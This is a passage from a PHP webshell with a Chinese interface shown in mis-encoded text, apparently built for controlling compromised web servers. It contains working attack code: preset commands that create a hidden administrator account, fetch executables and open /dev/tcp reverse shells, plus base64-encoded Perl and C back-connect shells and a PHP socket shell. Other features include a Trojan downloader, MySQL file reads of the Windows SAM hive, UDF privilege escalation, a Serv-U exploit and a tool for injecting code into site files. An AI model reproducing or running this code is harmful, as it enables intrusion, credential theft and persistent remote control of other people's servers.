");
$newpath = explode('/', $_GET['newcopy']);
$pathr[0] = $newpath[0];
for ($i = 1; $i < count($newpath); $i++) {
$pathr[] = urlencode($newpath[$i]);
}
$newcopy = implode('/', $pathr);
@copy($p, $newcopy) ? html_a("?eanver=main&path={$pp}", $newcopy . ' ' . $msg[4]) : msg($msg[5]);
die('');
break;
case "perm":
html_n("");
break;
case "info_f":
/**
 * Report a php.ini directive as "Yes"/"No" or its raw configured value.
 *
 * Reads the directive via get_cfg_var(), i.e. the php.ini / command-line
 * value rather than any runtime ini_set() override. The value is compared
 * loosely (==), exactly as the original switch did: anything equal to 0
 * (including the false returned for an unknown directive) yields "No",
 * anything equal to 1 yields "Yes", and every other value is returned as-is
 * (for example "128M" for memory_limit). Loose comparison of non-numeric
 * strings such as "On"/"Off" differs between PHP major versions, so those
 * should not be relied on to map to Yes/No.
 *
 * @param string $varname php.ini directive name
 * @return mixed "Yes", "No", or the untouched get_cfg_var() result
 */
function Info_Cfg($varname)
{
$configured = get_cfg_var($varname);
// The 0 test runs before the 1 test, mirroring the original case order.
if ($configured == 0) {
return "No";
}
if ($configured == 1) {
return "Yes";
}
return $configured;
}
/**
 * Report whether a PHP function is defined in this runtime.
 *
 * Thin wrapper over function_exists(); the environment table uses it to
 * probe for extensions (zlib, sockets, database clients, ...) by naming one
 * representative function. Presence is not the same as executability: on
 * PHP versions before 8.0, function_exists() still reports functions that
 * are listed in disable_functions, so a "Yes" here should be read together
 * with the disable_functions row.
 *
 * @param string $funName function name to probe
 * @return string "Yes" if the function is defined, otherwise "No"
 */
function Info_Fun($funName)
{
$defined = function_exists($funName);
return $defined ? "Yes" : "No";
}
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�";
$adminmail = isset($_SERVER['SERVER_ADMIN']) ? "" . $_SERVER['SERVER_ADMIN'] . "" : "" . get_cfg_var("sendmail_from") . "";
if ($dis_func == "") {
$dis_func = "No";
} else {
$dis_func = str_replace(" ", " ", $dis_func);
$dis_func = str_replace(",", " ", $dis_func);
}
$phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No";
$info = array(array("������ʱ��/����ʱ��", date("Y��m��d�� h:i:s", time()) . " / " . gmdate("Y��n��j�� H:i:s", time() + 8 * 3600)), array("����������:�˿�(ip)", "" . $_SERVER['SERVER_NAME'] . ":" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"), array("����������ϵͳ(���ֱ�\r\n��)", PHP_OS . " (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"), array("��������������", $_SERVER['SERVER_SOFTWARE']), array("���IP", getenv('REMOTE_ADDR')), array("PHP���з�ʽ(\r\n�汾)", strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / ��ȫģʽ:" . Info_Cfg("safemode")), array("����������Ա", $adminmail), array("���ļ�·��", __FILE__), array("����ʹ��URL���ļ�[allow_url_fopen]", Info_Cfg("allow_url_fopen")), array("������̬�������ӿ�[enable_dl]", Info_Cfg("enable_dl")), array("��ʾ������Ϣ[display_errors]", Info_Cfg("display_errors")), array("�Զ���ȫ�ֱ���[register_globals]", Info_Cfg("register_globals")), array("�Զ��ַ���ת��[magic_quotes_gpc]", Info_Cfg("magic_quotes_gpc")), array("����ڴ�ʹ����[memory_limit]", Info_Cfg("memory_limit")), array("POST����ֽ�[post_max_size]", Info_Cfg("post_max_size")), array("��������ϴ�[upload_max_filesize]", $upsize), array("���������ʱ��[max_execution_time]", Info_Cfg("max_execution_time") . "��"), array("���ú���[disable_functions]", $dis_func), array("������Ϣ����[phpinfo()]", $phpinfo), array("Ŀǰ���п���ռ�diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 
'Mb'), array("GZѹ���ļ�֧��[zlib]", Info_Fun("gzclose")), array("ZIPѹ���ļ�֧��[ZipArchive(php_zip)]", Info_Fun("zip_open")), array("IMAP�����ʼ�ϵͳ", Info_Fun("imap_close")), array("XML����", Info_Fun("xml_set_object")), array("FTP��½", Info_Fun("ftp_login")), array("Session֧��", Info_Fun("session_start")), array("Socket֧��", Info_Fun("fsockopen")), array("MySQL���ݿ�", Info_Fun("mysql_close")), array("MSSQL���ݿ�", Info_Fun("mssql_close")), array("Postgre SQL���ݿ�", Info_Fun("pg_close")), array("SQLite���ݿ�", Info_Fun("sqlite_close")), array("Oracle���ݿ�", Info_Fun("ora_close")), array("Oracle 8���ݿ�", Info_Fun("OCILogOff")), array("SyBase���ݿ�", Info_Fun("sybase_close")), array("Hyperwave���ݿ�", Info_Fun("hw_close")), array("InforMix���ݿ�", Info_Fun("ifx_close")), array("FilePro���ݿ�", Info_Fun("filepro_fieldcount")), array("DBA/DBM����", Info_Fun("dba_close") . " / " . Info_Fun("dbmclose")), array("ODBC/dBASE����", Info_Fun("odbc_close") . " / " . Info_Fun("dbase_close")), array("PREL�����[PCRE]", Info_Fun("preg_match")), array("PDF֧��", Info_Fun("pdf_close")), array("ͼ�δ���[GD Library]", Info_Fun("imageline")), array("SNMP�������Э��", Info_Fun("snmpget")));
echo '';
for ($i = 0; $i < count($info); $i++) {
echo '' . $info[$i][0] . ' | ' . $info[$i][1] . ' | ' . "\n";
}
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
try {
$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber");
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
} catch (Exception $e) {
}
echo 'Terminal Service�˿�Ϊ | ' . $registry_proxystring . ' | ' . "\n";
echo 'Telnet�˿�Ϊ | ' . $Telnet . ' | ' . "\n";
echo 'PcAnywhere�˿�Ϊ | ' . $PcAnywhere . ' | ' . "\n";
echo ' ';
break;
case "cmd":
$res = '���Դ���';
$cmd = 'dir';
if (!empty($_POST['cmd'])) {
$res = Exec_Run(base64_decode($_POST['cmd']));
$cmd = htmlspecialchars(base64_decode($_POST['cmd']));
}
print <<
function sFull(i){
\tStr = new Array(11);
\tStr[0] = "dir";
\tStr[1] = "net user KillWaf 1P@ssWord /add";
\tStr[2] = "net localgroup administrators KillWaf /add";
\tStr[3] = "netstat -ano";
\tStr[4] = "ipconfig";
\tStr[5] = "copy c:\\1.php d:\\2.php";
\tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";
\tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";
\tStr[8] = "tasklist -svc";
\tdocument.getElementById('cmd').value = Str[i];
\treturn true;
}
END;
html_base();
print <<
END;
break;
case "linux":
$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR');
$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666';
$system = strtoupper(substr(PHP_OS, 0, 3));
print <<ʹ�÷�����
\t\t\t�����Լ���������"nc -vv -l 12666"
\t\t\tȻ���ڴ���д����Ե�IP,�����ӣ��˷�����ȫ��ʵ�ã�����NC������
END;
if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) {
echo '';
if ($_POST['use'] == 'perl') {
$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
echo File_Write('/tmp/envl_bc', base64_decode($back_connect_pl), 'wb') ? '����/tmp/envl_bc�ɹ� ' : '����/tmp/envl_bcʧ�� ';
$perlpath = Exec_Run('which perl');
$perlpath = $perlpath ? chop($perlpath) : 'perl';
@unlink('/tmp/envl_bc.c');
echo Exec_Run($perlpath . ' /tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��';
}
if ($_POST['use'] == 'c') {
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
echo File_Write('/tmp/envl_bc.c', base64_decode($back_connect_c), 'wb') ? '����/tmp/envl_bc.c�ɹ� ' : '����/tmp/envl_bc.cʧ�� ';
$res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c');
@unlink('/tmp/envl_bc.c');
echo Exec_Run('/tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��';
}
if ($_POST['use'] == 'php') {
if (!extension_loaded('sockets')) {
if ($system == 'WIN') {
@dl('php_sockets.dll') or die("Can't load socket");
} else {
@dl('sockets.so') or die("Can't load socket");
}
}
if ($system == "WIN") {
$env = array('path' => 'c:\\windows\\system32');
} else {
$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$host = $_POST['yourip'];
$port = $_POST['yourport'];
$host = gethostbyname($host);
$proto = getprotobyname("tcp");
if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) {
die("Socket����ʧ��");
}
if (($ret = socket_connect($sock, $host, $port)) < 0) {
die("����ʧ��");
} else {
$message = "----------------------PHP��������--------------------\n";
socket_write($sock, $message, strlen($message));
$cwd = str_replace('\\', '/', dirname(__FILE__));
while ($cmd = socket_read($sock, 65535, $proto)) {
if (trim(strtolower($cmd)) == "exit") {
socket_write($sock, "Bye\n");
exit;
} else {
$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
fwrite($pipes[0], $cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
socket_write($sock, $msg, strlen($msg));
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
socket_write($sock, $msg, strlen($msg));
$return_value = proc_close($process);
}
}
}
}
}
if ($_POST['use'] == 'nc') {
echo ' ';
$mip = $_POST['yourip'];
$bport = $_POST['yourport'];
$fp = fsockopen($mip, $bport, $errno, $errstr);
if (!$fp) {
$result = "Error: could not open socket connection";
} else {
fputs($fp, "\n*********************************************\n \r\n\t\t hacking url:http://www.phpinfo.cc is ok! \r\n\t\t\t \n*********************************************\n\n");
while (!feof($fp)) {
fputs($fp, " [r00t@H4c3ing:/root]# ");
$result = fgets($fp, 4096);
$message = `{$result}`;
fputs($fp, "--> " . $message . "\n");
}
fclose($fp);
}
echo ' ';
}
echo ' ����Գ������Ӷ˿� (nc -vv -l ' . $_POST['yourport'] . ') ';
}
break;
case "sqlshell":
$MSG_BOX = '';
$mhost = 'localhost';
$muser = 'root';
$mport = '3306';
$mpass = '';
$mdata = 'mysql';
$msql = 'select version();';
if (isset($_POST['mhost']) && isset($_POST['muser'])) {
$mhost = $_POST['mhost'];
$muser = $_POST['muser'];
$mpass = $_POST['mpass'];
$mdata = $_POST['mdata'];
$mport = $_POST['mport'];
if ($conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass)) {
@mysql_select_db($mdata);
} else {
$MSG_BOX = '����MYSQLʧ��';
}
}
$downfile = 'c:/windows/repair/sam';
if (!empty($_POST['downfile'])) {
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x' . $binpath . ')';
if ($result = @mysql_query($query, $conn)) {
$k = 0;
$downcode = '';
while ($row = @mysql_fetch_array($result)) {
$downcode .= $row[$k];
$k++;
}
$filedown = basename($downfile);
if (!$filedown) {
$filedown = 'envl.tmp';
}
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-' . $arrayend);
header('Content-Disposition: attachment; filename=' . $filedown);
header('Content-Length: ' . strlen($downcode));
echo $downcode;
exit;
} else {
$MSG_BOX = '�����ļ�ʧ��';
}
}
$o = isset($_GET['o']) ? $_GET['o'] : '';
print <<
��ַ
�˿�
�û�
����
����
END;
if ($o == 'u') {
$uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs';
if (!empty($_POST['uppath'])) {
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if (@mysql_query($query, $conn)) {
if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) {
$filecode = bin2hex(File_Read($tmpcode));
} else {
$tmp = File_Str(dirname(myaddress)) . '/upfile.tmp';
if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) {
$filecode = bin2hex(File_Read($tmp));
@unlink($tmp);
}
}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x' . $filecode . ',CHAR));';
if (@mysql_query($query, $conn)) {
$query = 'SELECT cmd FROM a INTO DUMPFILE \'' . $uppath . '\';';
$MSG_BOX = @mysql_query($query, $conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��';
} else {
$MSG_BOX = '������ʱ��ʧ��';
}
@mysql_query('Drop TABLE IF EXISTS a;', $conn);
} else {
$MSG_BOX = '������ʱ��ʧ��';
}
}
print << �ϴ�·��
ѡ���ļ�
END;
} elseif ($o == 'tk') {
if ($_POST['dump'] == 'dump') {
$mysql_link = @mysql_connect($mhost, $muser, $mpass);
mysql_select_db($mdata);
mysql_query("SET NAMES gbk");
$mysql = "";
$q1 = mysql_query("show tables");
while ($t = mysql_fetch_array($q1)) {
$table = $t[0];
$q2 = mysql_query("show create table `{$table}`");
$sql = mysql_fetch_array($q2);
$mysql .= $sql['Create Table'] . ";\r\n\r\n";
$q3 = mysql_query("select * from `{$table}`");
while ($data = mysql_fetch_assoc($q3)) {
$keys = array_keys($data);
$keys = array_map('addslashes', $keys);
$keys = join('`,`', $keys);
$keys = "`" . $keys . "`";
$vals = array_values($data);
$vals = array_map('addslashes', $vals);
$vals = join("','", $vals);
$vals = "'" . $vals . "'";
$mysql .= "insert into `{$table}`({$keys}) values({$vals});\r\n";
}
$mysql .= "\r\n";
}
$filename = date("Y-m-d-GisA") . ".sql";
$fp = fopen($filename, 'w');
fputs($fp, $mysql);
fclose($fp);
$tip = " ���ݱ��ݳɹ�������������ݿ��ļ���[" . $filename . "]";
} else {
$tip = "��δ���ݣ���֤����������Ŀ¼��д";
}
print <<
END;
} elseif ($o == 'd') {
print <<
�����ļ�
END;
} else {
if (!empty($_POST['msql'])) {
$msql = $_POST['msql'];
if ($result = @mysql_query($msql, $conn)) {
$MSG_BOX = 'ִ��SQL���ɹ� ';
$k = 0;
while ($row = @mysql_fetch_array($result)) {
$MSG_BOX .= $row[$k];
$k++;
}
} else {
$MSG_BOX .= mysql_error();
}
}
print <<
function nFull(i){
\tStr = new Array(11);
\tStr[0] = "select version();";
\tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
\tStr[2] = "select '' into outfile 'F:/web/bak.php';";
\tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
\tStr[4] = "select @@plugin_dir";
\tStr[5] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib::\$INDEX_ALLOCATION';";
\tStr[6] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib\\\\\\\\plugin::\$INDEX_ALLOCATION';";
\tnform.msql.value = Str[i];
\treturn true;
}
END;
}
if ($MSG_BOX != '') {
echo ' ' . $MSG_BOX . ' ';
} else {
echo ' ';
}
break;
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . '/muma.exe');
print <<
������
���ص�
END;
if (!empty($_POST['durl']) && !empty($_POST['dpath'])) {
echo '';
$contents = @file_get_contents($_POST['durl']);
if (!$contents) {
echo '����ȡҪ���ص�����';
} else {
echo File_Write($_POST['dpath'], $contents, 'wb') ? '�����ļ��ɹ�' : '�����ļ�ʧ��';
}
echo ' ';
}
break;
case "issql":
session_start();
if ($_POST['sqluser'] && $_POST['sqlpass']) {
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
}
if ($_POST['sqlhost']) {
$_SESSION['sql_host'] = $_POST['sqlhost'];
} else {
$_SESSION['sql_host'] = 'localhost';
}
if ($_POST['sqlport']) {
$_SESSION['sql_port'] = $_POST['sqlport'];
} else {
$_SESSION['sql_port'] = '3306';
}
if ($_SESSION['sql_user'] && $_SESSION['sql_password']) {
if (!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))) {
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell', '����ʧ���뷵��'));
}
} else {
die(html_a('?eanver=sqlshell', '����ʧ���뷵��'));
}
$query = mysql_query("SHOW DATABASES", $sqlcon);
html_n('���ݿ��б�:');
while ($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db=' . $db['Database'], $db['Database']);
echo ' ';
}
html_n(' | ');
if ($_GET['db']) {
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n(' ');
if (!empty($_POST['sql'])) {
if (@mysql_query($_POST['sql'], $sqlcon)) {
echo "ִ��SQL���ɹ�";
} else {
echo "����: " . mysql_error();
}
}
if ($_GET['table']) {
html_n('');
$query = "SHOW COLUMNS FROM " . $_GET['table'];
$result = mysql_query($query, $sqlcon);
$fields = array();
while ($row = mysql_fetch_assoc($result)) {
array_push($fields, $row['Field']);
html_n('' . $row['Field'] . ' | ');
}
html_n(' ');
$result = mysql_query("SELECT * FROM " . $_GET['table'], $sqlcon) or die(mysql_error());
while ($text = @mysql_fetch_assoc($result)) {
foreach ($fields as $row) {
if ($text[$row] == "") {
$text[$row] = 'NULL';
}
html_n('' . $text[$row] . ' | ');
}
echo ' ';
}
} else {
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)) {
html_n("" . $row[0] . " | ");
}
}
}
break;
case "upfiles":
html_n('�����������ϴ������ļ���С: ' . @get_cfg_var('upload_max_filesize') . '');
break;
case "guama":
$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
$codet = isset($_POST['code']) ? $_POST['code'] : "";
html_n(' | �ļ���������"|"����,Ҳ������ָ���ļ���. | ');
if (!empty($_POST['path'])) {
html_n('Ŀ���ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($patht, $codet, $_POST['return'], $bool, $typet);
}
break;
case "tihuan":
html_n(' | �˹��ܿ������滻�ļ�����,��С��ʹ��.
| ');
if (!empty($_POST['path'])) {
html_n('Ŀ���ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($_POST['path'], $_POST['newcode'], "tihuan", $bool, $_POST['oldcode']);
}
break;
case "scanfile":
css_js("4");
html_n(' | �˹��ܿɺܷ��������������MYSQL�û�����������ļ�,������Ȩ. ���������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼����. | ');
if (!empty($_POST['path'])) {
html_n('�ҵ��ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($_POST['path'], $_POST['code'], $_POST['return'], $bool);
}
break;
case "scanphp":
html_n(' | ԭ���Ǹ��������붨���,��鿴�����жϺ��ٽ���ɾ��. | ');
if (!empty($_POST['path'])) {
html_n('�ҵ��ļ�:
');
if (isset($_POST['pass'])) {
$bool = true;
} else {
$bool = false;
}
do_passreturn($_POST['path'], $_POST['class'], "scanphp", $bool);
}
break;
case "port":
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873';
print <<
ɨ��IP
�˿ں�
END;
if (!empty($_POST['ip']) && !empty($_POST['port'])) {
echo '';
$ports = explode('|', $_POST['port']);
for ($i = 0; $i < count($ports); $i++) {
$fp = @fsockopen($_POST['ip'], $ports[$i], $errno, $errstr, 2);
echo $fp ? '���Ŷ˿� ---> ' . $ports[$i] . ' ' : '�رն˿� ---> ' . $ports[$i] . ' ';
ob_flush();
flush();
}
echo ' ';
}
break;
case "getcode":
if (isset($_POST['url'])) {
$proxycontents = @file_get_contents($_POST['url']);
echo $proxycontents ? $proxycontents : "
��ȡ URL ����ʧ�� ";
exit;
}
print <<
|
END;
break;
case "servu":
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print <<[ִ������] [�����û�]
';
if (!empty($_POST['SUPort']) && !empty($_POST['SUUser']) && !empty($_POST['SUPass'])) {
echo '';
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n" . "-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n" . "-TZOEnable=0\r\n" . " TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n" . "-IP=0.0.0.0\r\n" . "-PortNo=21\r\n" . "-User=" . $_POST['user'] . "\r\n" . "-Password=" . $_POST['password'] . "\r\n" . "-HomeDir=c:\\\r\n" . "-LoginMesFile=\r\n" . "-Disable=0\r\n" . "-RelPaths=1\r\n" . "-NeedSecure=0\r\n" . "-HideHidden=0\r\n" . "-AlwaysAllowLogin=0\r\n" . "-ChangePassword=0\r\n" . "-QuotaEnable=0\r\n" . "-MaxUsersLoginPerIP=-1\r\n" . "-SpeedLimitUp=0\r\n" . "-SpeedLimitDown=0\r\n" . "-MaxNrUsers=-1\r\n" . "-IdleTimeOut=600\r\n" . "-SessionTimeOut=-1\r\n" . "-Expire=0\r\n" . "-RatioUp=1\r\n" . "-RatioDown=1\r\n" . "-RatiosCredit=0\r\n" . "-QuotaCurrent=0\r\n" . "-QuotaMaximum=0\r\n" . "-Maintenance=None\r\n" . "-PasswordType=Regular\r\n" . "-Ratios=None\r\n" . " Access=" . $_POST['part'] . "\\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n" . "-IP=0.0.0.0\r\n" . " PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"], $errno, $errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "USER " . $_POST["SUUser"] . "\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "PASS " . $_POST["SUPass"] . "\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = $domain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = $adduser;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
if (!empty($_POST['SUCommand'])) {
$exp = @fsockopen("127.0.0.1", "21", $errno, $errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "USER " . $_POST['user'] . "\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "PASS " . $_POST['password'] . "\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = "site exec " . $_POST["SUCommand"] . "\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: site exec " . $_POST["SUCommand"] . " ";
$recvbuf = @fgets($exp, 1024);
echo "�������ݰ�: {$recvbuf} ";
$sendbuf = $deldomain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "�������ݰ�: {$sendbuf} ";
$recvbuf = @fgets($sock, 1024);
echo "�������ݰ�: {$recvbuf} ";
@fclose($exp);
}
@fclose($sock);
echo ' ';
}
break;
case "phpcode":
$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
if ($phpcode != 'phpinfo();') {
$phpcode = htmlspecialchars(base64_decode($phpcode));
}
echo '');
break;
case "myexp":
$MSG_BOX = '���ȵ���DLL,��ִ������.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�. mysql5.1�汾��������mysql���Ŀ¼��װUDF��������ʧ��������NTFS-ADS�����ܴ����ļ���';
$info = '�������';
$mhost = 'localhost';
$muser = 'root';
$mport = '3306';
$mpass = '';
$mdata = 'mysql';
$mpath = 'C:/windows/mysqlDll.dll';
$sqlcmd = 'ver';
if (isset($_POST['mhost']) && isset($_POST['muser'])) {
$mhost = $_POST['mhost'];
$muser = $_POST['muser'];
$mpass = $_POST['mpass'];
$mdata = $_POST['mdata'];
$mport = $_POST['mport'];
$mpath = File_Str($_POST['mpath']);
$sqlcmd = $_POST['sqlcmd'];
$conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass);
if ($conn) {
@mysql_select_db($mdata);
if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) {
$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
if (@mysql_query($query, $conn)) {
$shellcode = Mysql_shellcode();
$query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));";
if (@mysql_query($query, $conn)) {
$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';';
if (@mysql_query($query, $conn)) {
$ap = explode('/', $mpath);
$inpath = array_pop($ap);
$query = 'Create Function state returns string soname \'' . $inpath . '\';';
